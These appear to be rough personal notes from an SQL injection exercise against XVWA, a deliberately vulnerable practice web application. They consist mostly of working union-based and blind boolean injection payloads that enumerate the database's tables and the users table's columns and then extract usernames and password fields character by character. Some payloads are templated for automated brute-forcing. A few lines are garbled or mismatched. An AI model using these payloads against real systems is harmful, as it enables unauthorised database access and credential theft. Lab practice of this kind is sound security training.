database xvwa


SELECT COUNT(*) FROM information_schema.tables WHERE table_schema = 'dbo' and TABLE_TYPE='BASE TABLE'


' union all select 1,2,3,4,5,6,7 #


1 8 char
2 8
3 5

          1    2    3    4   5   6   7    8
0 8 caffaine    99   97  102  102 97   105  110 101     
1 8 comments    99 111  109  109 101  110   116   115
2 5  users       117  115  101  114 115



caffaine,comments,users


users column number
     1    2   3    4   5   6   7   8   9   10 11 12 13 14 15 16 17 18 19 20
	 a    d   m    i   n                     a       s    e r                       
0  3 117  105 100  - uid
1  8 117  115 101  114 110  97  109 101  -  username
2  8 112 97  115  115  119    111  114   100 - password



  1 2 3 4 5 6 7 8
0   i d            
1     e     a   e       
2   a           d    


users = 
1 a
2 
3


username -   

-' union all select 1,2,3,group_concat(table_name),5,6,7 from information_schema.tables where table_schema=database()#

-' union all select 1,2,3,group_concat(column_name),5,6,7 from information_schema.columns where table_name='users'#

Blind SQL Injection   use 'AND' & 'OR' sometimes AND work and sometimes OR work




MySQL version--  ' and substring(version(),1,1)=5#   --------------- Mysql5




Database Version --- Length ---  ' and length(database())=4# ------ Database name Length 4
     

			  Database Name----  ' and substring(database(),1,1)='x'#   ----- Database Name xvwa
 


---------------------------------Fetch the tables from Database------------------------------------------------
 
Table ----Length of 1st Table 8-----  ' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 8# 
      ----Length of 2nd Table 8-----  ' AND (length((select table_name from information_schema.tables where table_schema=database() limit 1,1))) = 8#
      ----Length of 3rd Table 5-----  ' AND (length((select table_name from information_schema.tables where table_schema=database() limit 2,1))) = 5#



	  
Note:------
Where OR works ---AND Failed ----	  1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1)))=99#    
	           ---AND Passed ----      ' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1)))=99# 

               ---OR Passed ----      1' OR (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1)))=99#    
	           ---OR Failed ----       ' OR (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1)))=99# 
			   


			   
----Name of 1st Table 8-----caffaine   ' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1)))=99#  
  Note---   {(limit 0,1)(limit 1,1)------counting the no. of tables    ,1,1),2,1)-----------character position of the name of 1st table    ))=99  100------ascii value of char# }

				1    2     3    4    5   6    7    8
0 8 caffaine    99   97   102  102  97  105  110 101     
1 8 comments    99   111  109  109  101 110  116 115
2 5  users      117  115  101  114  115
  

  
  
' AND char((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))))='c'#																		   
																			   
				1   2   3  4  5  6  7  8
0 8 caffaine    c   a   f  f  a  i  n  e     
1 8 comments    c   o   m  m  e  n  t  s
2 5  users      u   s   e  r  s																		   
																			   
																			   


																			   
---------------------------------Fetch the columns in the user tables----------------------------------------------



-----Length of 1st Column 3-------------' AND (length((select column_name from information_schema.columns where table_name='users' limit 0,1))) = 3 #



-' AND (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1) ,1,1))) = 116 #


column name of users tables
      1    2   3    4   5   6    7   8
0  3 117  105 100  - uid
1  8 117  115 101  114 110  97  109 101  -  username
2  8 112  97  115  115 119  111 114 100 - password



' AND char((ascii(substr((select column_name from information_schema.columns where table_name='users' limit §0§,1) ,§1§,1)))) = '§a§'#

      1    2   3    4   5   6    7   8
0  3  u    i   d
1  8  u    s   e    r   n   a    m   e 
2  8  p    a   s    s   w   o    r   d




-----------------------Retrieve the data into the fields----------------------------
   12345678910 11 12 13 14 15 16   
  (admin,xvwa  ,  u  s  e  r  s  )
  
-1' or ascii(substring((SELECT group_concat(username) from users),1,1))= 97#  admin



-1' or char(ascii(substring((SELECT group_concat(username) from users),§1§,1)))='§a§'#  admin

users column number
     1    2   3    4   5   6   7   8   9   10 11 12 13 14 15 16 17 18 19 20
	 a    d   m    i   n                     a       s  e  r               

-' AND (length((select group_concat(username) from users limit 0,1),1,1)) = 97 #

-1' or char(ascii(substring((SELECT group_concat(username) from users),§1§,1)))='§v§'# retrieve the data into the fields